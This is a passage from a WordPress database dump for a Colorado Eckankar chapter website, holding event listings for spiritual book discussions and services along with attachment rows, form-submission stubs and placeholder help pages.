dreams. All are welcome to share ideas, ask questions or listen while others speak about the practical ways they use dream guidance.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The above description was inspired by the ECKANKAR Blog post \'<em><a href=\"https://www.eckankar.org/practical-benefits-of-dreams/\" target=\"_blank\" rel=\"noopener\">Practical Benefits of Dreams</a></em></span><span style=\"font-size: 14pt;\">\'.</span></p>\r\n<p><span style=\"font-size: 14pt;\">In the post you will find stories of real people who found lessons on healing, business, and finance along with a spiritual exercise on how to heal yourself.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/281239509/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - Spiritual Discussion:<br>The Practical Benefits of Dreams','','publish','closed','closed','','631-184','','','2021-10-07 09:55:21','2021-10-07 15:55:21','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265691',0,'mec-events','',0),(265692,2,'2021-10-07 09:39:41','2021-10-07 15:39:41','','canyon-trail-1','','inherit','closed','closed','','canyon-trail-1','','','2021-10-07 09:39:41','2021-10-07 15:39:41','',265691,'https://eckankar-colorado.org/wp-content/uploads/2021/10/canyon-trail-1.jpg',0,'attachment','image/jpeg',0),(265694,0,'2021-10-07 11:56:50','2021-10-07 17:56:50','','','','publish','closed','closed','','265694','','','2021-10-07 11:56:50','2021-10-07 17:56:50','',0,'https://eckankar-colorado.org/nf_sub/265694/',0,'nf_sub','',0),(265695,2,'2021-10-07 16:12:10','0000-00-00 00:00:00','<p><strong><span style=\"font-size: 14pt;\">Would you like to learn spiritual tools that can help you in your daily life?</span></strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Are you seeking a balance between taking action to solve your problems and surrendering to the Divine?</strong></span></p>\n<p>I<span style=\"font-size: 14pt;\">f you answered yes to either question, this ECK Light &amp; Sound Service will show you how to rise above your problems so that you can view them from a spiritual perspective and gain help from Spirit and the Mahanta (our spiritual guide).<br />\n<br />\n</span></p>\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\n<p><span style=\"color: #666666; font-size: 14pt;\">“...Sometimes, however, the problems we face seem beyond our abilities. Here is our opportunity to grow spiritually. Knowing how to work with the ECK, Divine Spirit, helps us overcome the fear of facing something that seems beyond our ability. We live a much more joyful, fulfilling life. Knowing how to strike a balance between doing everything within our power to address a problem and handing it over to the ECK is the secret of problem solving from a spiritual perspective.”</span></p>\n<p><span style=\"color: #666666; font-size: 14pt;\">\"Whether the problems we face are financial or health related or spring from a lack of self-discipline, there are spiritual exercises to help us address them.\"</span></p>\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> ECKANKAR--Ancient Wisdom for Today, </em>pp 84-85</span></p>\n</blockquote>\n<p><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\n<p><span style=\"font-size: 14pt;\">This Meetup group, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\n<p><span style=\"font-size: 14pt;\">This service will be in person at the ECK Temple of Colorado and also live streamed. The Zoom link will be provided to those people who RSVP that they are attending.</span></p>\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/275451327/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>12 Gifts of Spiritual Living: Finding Your Life\'s Purpose','','draft','closed','closed','','631-852-237','','','2021-10-07 16:12:10','2021-10-07 22:12:10','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265695',0,'mec-events','',0),(265696,0,'2021-10-07 16:18:58','2021-10-07 22:18:58','','','','publish','closed','closed','','265696','','','2021-10-07 16:18:58','2021-10-07 22:18:58','',0,'https://eckankar-colorado.org/nf_sub/265696/',0,'nf_sub','',0),(265705,0,'2021-10-09 12:33:56','2021-10-09 18:33:56','','','','publish','closed','closed','','265705','','','2021-10-09 12:33:56','2021-10-09 18:33:56','',0,'https://eckankar-colorado.org/nf_sub/265705/',0,'nf_sub','',0),(265707,0,'2021-10-10 10:22:29','2021-10-10 16:22:29','','','','publish','closed','closed','','265707','','','2021-10-10 10:22:29','2021-10-10 16:22:29','',0,'https://eckankar-colorado.org/nf_sub/265707/',0,'nf_sub','',0),(265728,0,'2021-10-14 11:23:12','2021-10-14 17:23:12','','','','publish','closed','closed','','265728','','','2021-10-14 11:23:12','2021-10-14 17:23:12','',0,'https://eckankar-colorado.org/nf_sub/265728/',0,'nf_sub','',0),(265736,2,'2021-10-17 13:14:09','2021-10-17 19:14:09','','hp-fall-bk-1-edit-1','','inherit','closed','closed','','hp-fall-bk-1-edit-1','','','2021-10-17 13:14:09','2021-10-17 19:14:09','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/10/hp-fall-bk-1-edit-1.jpg',0,'attachment','image/jpeg',0),(265743,2,'2021-10-18 10:29:29','2021-10-18 16:29:29','','','','publish','closed','closed','','265743','','','2021-10-18 10:29:29','2021-10-18 16:29:29','',0,'https://eckankar-colorado.org/nf_sub/265743/',0,'nf_sub','',0),(265744,2,'2021-10-18 10:43:26','2021-10-18 16:43:26','','','','publish','closed','closed','','265744','','','2021-10-18 10:43:26','2021-10-18 16:43:26','',0,'https://eckankar-colorado.org/nf_sub/265744/',0,'nf_sub','',0),(265745,2,'2021-10-18 11:03:01','2021-10-18 17:03:01','<div class=\"tmpl-call_to_action-17 boldgrid-section dynamic-gridblock background-parallax\" style=\"background-image: linear-gradient(to left, rgba(255, 255, 255, 0.4), rgba(255, 255, 255, 0.4)), url(\'https://eckankar-colorado.org/wp-content/uploads/2021/08/elss-bkgnd-2.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2021/08/elss-bkgnd-2.jpg\" data-bg-overlaycolor=\"rgba(255,255,255,0.4)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 200px; padding-bottom: 118px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"\">\r\n<p class=\"\" style=\"text-align: center; font-size: 49px; color: #1d5791;\">Thank You For Registering For Our Online Event!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 26px;\">You will receive login information soon via email.</p>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"row wow bounceInDown\" data-wow-duration=\"2s\" data-wow-delay=\"0s\" style=\"padding-top: 58px; padding-bottom: 0px;\">\r\n<div class=\"col-md-1 col-sm-1 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>','Thank You -- For Signing Up For Our Online Event','','publish','closed','closed','','thank-you-for-signing-up-for-our-event','','','2021-10-18 18:24:31','2021-10-19 00:24:31','',0,'https://eckankar-colorado.org/?page_id=265745',0,'page','',0),(265750,2,'2021-10-18 11:05:34','2021-10-18 17:05:34','','','','publish','closed','closed','','265750','','','2021-10-18 11:05:34','2021-10-18 17:05:34','',0,'https://eckankar-colorado.org/nf_sub/265750/',0,'nf_sub','',0),(265751,2,'2021-10-18 17:11:54','2021-10-18 23:11:54','','','','publish','closed','closed','','265751','','','2021-10-18 17:11:54','2021-10-18 23:11:54','',0,'https://eckankar-colorado.org/nf_sub/265751/',0,'nf_sub','',0),(265758,2,'2021-10-18 18:53:38','2021-10-19 00:53:38','<p><span style=\"font-size: 16pt;\"><strong>Did you know that there are no strings attached to God\'s love...that God loves each one of us simply because God is Love?</strong></span></p>\r\n<p><span style=\"font-size: 16pt;\"><strong>Are you ready to give others the freedom that you want for yourself and and grow in your ability to express God\'s love?</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">This ECK Light &amp; Sound Service will give you tools to help you accept others where they are and to love unconditionally. It will include personal stories and techniques that can help you in your daily life.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp says in his book \"<a href=\"https://www.eckbooks.org/items/Our_Spiritual_Wake_Up_Calls-19-3.html\" target=\"_blank\" rel=\"noopener\"><em>Our Spiritual Wake-up Calls</em></a>\", \"Tolerance means if someone doesn’t believe the way you do – in politics, religion, whatever – you let them have their own space. You let them have their own mind.\"</span></p>\r\n<p><span style=\"font-size: 14pt;\">Welcome to All. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.<br />\r\n<br />\r\n</span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>**</strong> <em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>','ECK Light and Sound Service - IN-PERSON','','publish','closed','closed','','776','','','2021-10-31 13:49:38','2021-10-31 19:49:38','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265758',0,'mec-events','',0),(265765,0,'2021-10-20 19:15:18','2021-10-21 01:15:18','','','','publish','closed','closed','','265765','','','2021-10-20 19:15:18','2021-10-21 01:15:18','',0,'https://eckankar-colorado.org/nf_sub/265765/',0,'nf_sub','',0),(265767,0,'2021-10-22 06:33:53','2021-10-22 12:33:53','','','','publish','closed','closed','','265767','','','2021-10-22 06:33:53','2021-10-22 12:33:53','',0,'https://eckankar-colorado.org/nf_sub/265767/',0,'nf_sub','',0),(265768,0,'2021-10-22 20:53:24','2021-10-23 02:53:24','','','','publish','closed','closed','','265768','','','2021-10-22 20:53:24','2021-10-23 02:53:24','',0,'https://eckankar-colorado.org/nf_sub/265768/',0,'nf_sub','',0),(265782,0,'2021-10-24 10:52:38','2021-10-24 16:52:38','','','','publish','closed','closed','','265782','','','2021-10-24 10:52:38','2021-10-24 16:52:38','',0,'https://eckankar-colorado.org/nf_sub/265782/',0,'nf_sub','',0),(265787,0,'2021-10-26 08:04:12','2021-10-26 14:04:12','','','','publish','closed','closed','','265787','','','2021-10-26 08:04:12','2021-10-26 14:04:12','',0,'https://eckankar-colorado.org/nf_sub/265787/',0,'nf_sub','',0),(265788,2,'2021-10-26 12:30:31','2021-10-26 18:30:31','<!-- wp:paragraph -->\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n<!-- /wp:paragraph -->','Creating New Email Addresses','','private','open','closed','','creating-new-email-addresses','','','2021-10-26 13:04:17','2021-10-26 19:04:17','',0,'https://eckankar-colorado.org/?post_type=docs&#038;p=265788',0,'docs','',0),(265801,2,'2021-10-26 13:11:34','2021-10-26 19:11:34','<!-- wp:paragraph -->\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n<!-- /wp:paragraph -->','WordPress Admin Menu','','private','open','closed','','wordpress-admin-menu','','','2021-10-26 13:11:35','2021-10-26 19:11:35','',0,'https://eckankar-colorado.org/?post_type=docs&#038;p=265801',0,'docs','',0),(265803,2,'2021-10-26 13:13:33','2021-10-26 19:13:33','<!-- wp:paragraph -->\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n<!-- /wp:paragraph -->','Adding Images To Media Manager','','private','open','closed','','adding-images-to-media-manager','','','2021-10-26 13:13:34','2021-10-26 19:13:34','',0,'https://eckankar-colorado.org/?post_type=docs&#038;p=265803',0,'docs','',0),(265805,2,'2021-10-26 13:16:00','2021-10-26 19:16:00','<!-- wp:paragraph -->\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n<!-- /wp:paragraph -->','Admin Maintanance','','private','open','closed','','admin-maintanance','','','2021-10-26 13:16:02','2021-10-26 19:16:02','',0,'https://eckankar-colorado.org/?post_type=docs&#038;p=265805',0,'docs','',0),(265818,2,'2021-10-27 09:49:50','2021-10-27 15:49:50','','rockies-4','','inherit','closed','closed','','rockies-4','','','2021-10-27 09:49:50','2021-10-27 15:49:50','',7162,'https://eckankar-colorado.org/wp-content/uploads/2021/10/rockies-4.jpg',0,'attachment','image/jpeg',0),(265829,0,'2021-10-27 19:36:53','2021-10-28 01:36:53','','','','publish','closed','closed','','265829','','','2021-10-27 19:36:53','2021-10-28 01:36:53','',0,'https://eckankar-colorado.org/nf_sub/265829/',0,'nf_sub','',0),(265830,0,'2021-10-27 20:06:02','2021-10-28 02:06:02','','','','publish','closed','closed','','265830','','','2021-10-27 20:06:02','2021-10-28 02:06:02','',0,'https://eckankar-colorado.org/nf_sub/265830/',0,'nf_sub','',0),(265831,2,'2022-01-18 09:30:20','0000-00-00 00:00:00','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever wondered if you have had past lives or feel like you have known someone for a long time even though you just met?</span></strong></span></p>\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Are your dreams so jumbled that you feel you cannot understand them at all?</span></strong></span></p>\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever felt there is more to life and wondered how to understand these feelings?</span></strong></span></p>\n<p><span style=\"font-size: 14pt;\">Join us for three one-hour book discussions on the topics of Past Lives and Reincarnation, Dreams, and Soul Travel. During these book discussions you will have the opportunity to share your experiences and ask questions about these topics.</span></p>\n<p><strong><span style=\"font-size: 14pt;\">* Learn ways to experience your past lives through dream recall.</span></strong><br />\n<strong><span style=\"font-size: 14pt;\">* Understand the purpose of reincarnation.</span></strong><br />\n<strong><span style=\"font-size: 14pt;\">* Find ways to understand your dreams.</span></strong><br />\n<strong><span style=\"font-size: 14pt;\">* Learn how to shift your consciousness or what is also known as Soul Travel.</span></strong></p>\n<p><span style=\"font-size: 14pt;\">Books will be provided for free and there is no cost for the discussions.</span></p>\n<p><span style=\"font-size: 14pt;\">This discussion series is sponsored by ECKANKAR, the Path of Spiritual Freedom as a community service for all people and faiths.</span></p>\n<p><span style=\"font-size: 14pt;\">All are welcome.<br />\n<br />\n</span></p>\n<p><strong>COVID-19 Safety Measures<br />\n</strong><strong>**</strong><em>Per Jefferson County requirements, face masks are required in all public indoor spaces for anyone over the age of 3 with the exception of individuals leading a religious service as long as they maintain a twelve-foot distance. At our in-person events, Colorado Satsang Society will require face masks to be worn. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/wmjhpsyccnbjb/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Outlying - IN PERSON Meetup<br>Title Here','','draft','closed','closed','','631-234-428-384','','','2022-01-18 09:30:20','2022-01-18 16:30:20','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265831',0,'mec-events','',0),(265832,2,'2021-10-28 09:12:01','2021-10-28 15:12:01','<p><strong><span style=\"font-size: 16pt;\">Do you want to express more love in your relationships?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Are you interested in techniques to improve your relationships with family, friends, and co-workers?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">In this discussion we will discover the secret of all relationships and practical ways to improve your interactions with others. The discussion will be based on the book by Harold Klemp titled \"<a href=\"https://www.amazon.com/ECK-Wisdom-Relationships/dp/157043493X/ref=pd_lpo_1?pd_rd_i=157043493X&amp;psc=1\" target=\"_blank\" rel=\"noopener\">ECK Wisdom on Relationships.\"</a> This book will be given as a gift to all new attendees.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All of our discussions are held at the Pagosa Lakes Property Owner Association (PLPOA) Club House at 6:30 p.m. The clubhouse is located at 240 Port Avenue across from the PLPOA admin office. You can attend either or both of these discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p><span style=\"font-size: 14pt;\">These events are sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/281699416/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Pagosa Springs - In Person Meetup<br>ECK Wisdom on Relationships','','publish','closed','closed','','631-234-428-384-972','','','2021-10-28 09:23:35','2021-10-28 15:23:35','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265832',0,'mec-events','',0),(265833,2,'2021-10-28 09:08:14','2021-10-28 15:08:14','','boy-mom-1','','inherit','closed','closed','','boy-mom-1','','','2021-10-28 09:08:14','2021-10-28 15:08:14','',265832,'https://eckankar-colorado.org/wp-content/uploads/2021/10/boy-mom-1.jpg',0,'attachment','image/jpeg',0),(265835,2,'2021-10-28 09:21:21','2021-10-28 15:21:21','<p><strong><span style=\"font-size: 16pt;\">Are you ready to move beyond your limiting beliefs and attitudes that impact your daily life?<br />\r\n</span><span style=\"font-size: 16pt;\">Are you interested in techniques to expand your awareness and move into your fullest expression?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">In this discussion we will discover the secret of true freedom and practical ways to move beyond limitations. The discussion will be based on the book by Harold Klemp titled \"<a href=\"https://www.amazon.com/Wisdom-Spiritual-Freedom-Harold-Klemp-ebook/dp/B08LNTRJN1/ref=sr_1_1?crid=3MVO6KX818VZ9&amp;dchild=1&amp;keywords=ECK+Wisdom+on+Spiritual+Freedom&amp;qid=1635434846&amp;s=books&amp;sprefix=eck+wisdom+on+spiritual+freedom%2Cstripbooks%2C494&amp;sr=1-1\" target=\"_blank\" rel=\"noopener\">ECK Wisdom on Spiritual Freedom</a>.\" This book will be given as a gift to all new attendees.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All of our discussions are held at the Pagosa Lakes Property Owner Association (PLPOA) Club House at 6:30 p.m. The clubhouse is located at 240 Port Avenue across from the PLPOA admin office. You can attend either or both of these discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p><span style=\"font-size: 14pt;\">These events are sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/281699563/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Pagosa Springs - In Person Meetup<br>ECK Wisdom on Spiritual Freedom','','publish','closed','closed','','631-234-428-384-972-684','','','2021-10-28 09:36:44','2021-10-28 15:36:44','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265835',0,'mec-events','',0),(265836,2,'2021-10-28 09:44:29','2021-10-28 15:44:29','<p><strong><span style=\"font-size: 16pt;\">Would you like to face the world with more love and less fear?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Are you interested in techniques to help you move beyond your fears and create your life from a place of courage and wisdom?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">In this discussion we will take a look at the keys to overcoming fear. The discussion will be based on the book by Harold Klemp titled \"<a href=\"https://www.amazon.com/Wisdom-Conquering-Fear-Harold-Klemp-ebook/dp/B08LNLQYZY/ref=sr_1_6?crid=3MVO6KX818VZ9&amp;dchild=1&amp;keywords=ECK+Wisdom+on+Spiritual+Freedom&amp;qid=1635434846&amp;s=books&amp;sprefix=eck+wisdom+on+spiritual+freedom%2Cstripbooks%2C494&amp;sr=1-6\">ECK Wisdom on Conquering Fear</a>.\" This book will be given as a gift to all new attendees.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All of our discussions are held at the Pagosa Lakes Property Owner Association (PLPOA) Club House at 6:30 p.m. The clubhouse is located at 240 Port Avenue across from the PLPOA admin office. You can attend either or both of these discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p><span style=\"font-size: 14pt;\">These events are sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/281699511/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Pagosa Springs - In Person Meetup<br>ECK Wisdom on Conquering Fear','','publish','closed','closed','','631-234-428-384-972-305','','','2021-10-28 09:44:29','2021-10-28 15:44:29','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265836',0,'mec-events','',0),(265838,2,'2021-10-28 09:30:12','2021-10-28 15:30:12','','happy-jump-1','','inherit','closed','closed','','happy-jump-1','','','2021-10-28 09:30:12','2021-10-28 15:30:12','',265835,'https://eckankar-colorado.org/wp-content/uploads/2021/10/happy-jump-1.jpg',0,'attachment','image/jpeg',0),(265839,2,'2021-10-28 09:51:27','2021-10-28 15:51:27','<p><strong><span style=\"font-size: 16pt;\">Are you looking for improved health and healing on a physical, emotional, or spiritual level?<br />\r\n</span></strong><strong><span style=\"font-size: 16pt;\">Would you like to learn techniques to promote your own healing?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">In this discussion we will discover the greatest force that you can use for healing. The discussion will be based on the book by Harold Klemp titled \"<a href=\"https://www.amazon.com/Wisdom-Health-Healing-Harold-Klemp-ebook/dp/B08LNT4XDN/ref=sr_1_1?crid=2DAUNVLNXMZDE&amp;dchild=1&amp;keywords=ECK+Wisdom+on+Health+and+Healing&amp;qid=1635436176&amp;s=books&amp;sprefix=eck+wisdom+on+health+and+healing%2Cstripbooks%2C253&amp;sr=1-1\" target=\"_blank\" rel=\"noopener\">ECK Wisdom on Health and Healing</a>.\" This book will be given as a gift to all new attendees. </span></p>\r\n<p><span style=\"font-size: 14pt;\">All of our discussions are held at the Pagosa Lakes Property Owner Association (PLPOA) Club House at 6:30 p.m. The clubhouse is located at 240 Port Avenue across from the PLPOA admin office. You can attend either or both of these discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p><span style=\"font-size: 14pt;\">These events are sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/281699617/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Pagosa Springs - In Person Meetup<br>ECK Wisdom on Health and Healing','','publish','closed','closed','','631-234-428-384-972-305-878','','','2021-10-28 09:51:27','2021-10-28 15:51:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265839',0,'mec-events','',0),(265840,2,'2021-10-28 09:50:53','2021-10-28 15:50:53','','forest-2','','inherit','closed','closed','','forest-2','','','2021-10-28 09:50:53','2021-10-28 15:50:53','',265839,'https://eckankar-colorado.org/wp-content/uploads/2021/10/forest-2.jpg',0,'attachment','image/jpeg',0),(265855,2,'2021-10-31 13:46:50','2021-10-31 19:46:50','','happy-crowd-1','','inherit','closed','closed','','happy-crowd-1','','','2021-10-31 13:46:50','2021-10-31 19:46:50','',265758,'https://eckankar-colorado.org/wp-content/uploads/2021/10/happy-crowd-1.jpg',0,'attachment','image/jpeg',0),(265857,2,'2021-10-31 14:00:34','2021-10-31 20:00:34','<p><span style=\"font-size: 16pt;\"><strong>You are invited to explore your eternal nature!</strong></span></p>\r\n<p><strong><span style=\"font-size: 16pt;\">Have you ever wanted to gain valuable insights to improve the quality of your life?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Discover how dreams and Soul Travel are a source of inner truth and wisdom. Find out how God speaks through everyday events and people. Learn how to solve problems by tapping into the Supreme Creative Force. And for a happier life, gain insights into how past lives influence who you are today.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Based on the book ECKANKAR—<em>Ancient Wisdom for Today</em>. Explore these life-changing topics:</span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>November 3rd Topics:</strong> Problem Solving, Prophecy, and Divine Love</span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>November 10th Topics:</strong> Initiation, Masters, and Your Secret Path to God</span></p>\r\n<p><span style=\"font-size: 14pt;\">The book ECKANKAR—Ancient Wisdom for Today will be given as a gift to all new attendees.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All of our discussions are held at the Pagosa Lakes Property Owner Association (PLPOA) Club House at 6:30 p.m. The clubhouse is located at 240 Port Avenue across from the PLPOA admin office. You can attend either or both of these discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p><span style=\"font-size: 14pt;\">These events are sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p>&nbsp;</p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/281522824/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Pagosa Springs - In Person Meetup<br>\'Ancient Wisdom for Today\'<br>In-Person Book Discussion, Part One','','publish','closed','closed','','631-234-428-384-972-305-878-589','','','2021-10-31 14:00:34','2021-10-31 20:00:34','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265857',0,'mec-events','',0),(265858,2,'2021-10-31 13:59:05','2021-10-31 19:59:05','','star-temple-1','','inherit','closed','closed','','star-temple-1','','','2021-10-31 13:59:05','2021-10-31 19:59:05','',265857,'https://eckankar-colorado.org/wp-content/uploads/2021/10/star-temple-1.jpg',0,'attachment','image/jpeg',0),(265861,2,'2021-10-31 14:03:21','2021-10-31 20:03:21','<p><span style=\"font-size: 16pt;\"><strong>You are invited to explore your eternal nature!</strong></span></p>\r\n<p><strong><span style=\"font-size: 16pt;\">Have you ever wanted to gain valuable insights to improve the quality of your life?</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Discover how dreams and Soul Travel are a source of inner truth and wisdom. Find out how God speaks through everyday events and people. Learn how to solve problems by tapping into the Supreme Creative Force. And for a happier life, gain insights into how past lives influence who you are today.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Based on the book ECKANKAR—<em>Ancient Wisdom for Today</em>. Explore these life-changing topics:</span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>November 3rd Topics:</strong> Problem Solving, Prophecy, and Divine Love</span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>November 10th Topics:</strong> Initiation, Masters, and Your Secret Path to God</span></p>\r\n<p><span style=\"font-size: 14pt;\">The book ECKANKAR—Ancient Wisdom for Today will be given as a gift to all new attendees.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All of our discussions are held at the Pagosa Lakes Property Owner Association (PLPOA) Club House at 6:30 p.m. The clubhouse is located at 240 Port Avenue across from the PLPOA admin office. You can attend either or both of these discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p><span style=\"font-size: 14pt;\">These events are sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" 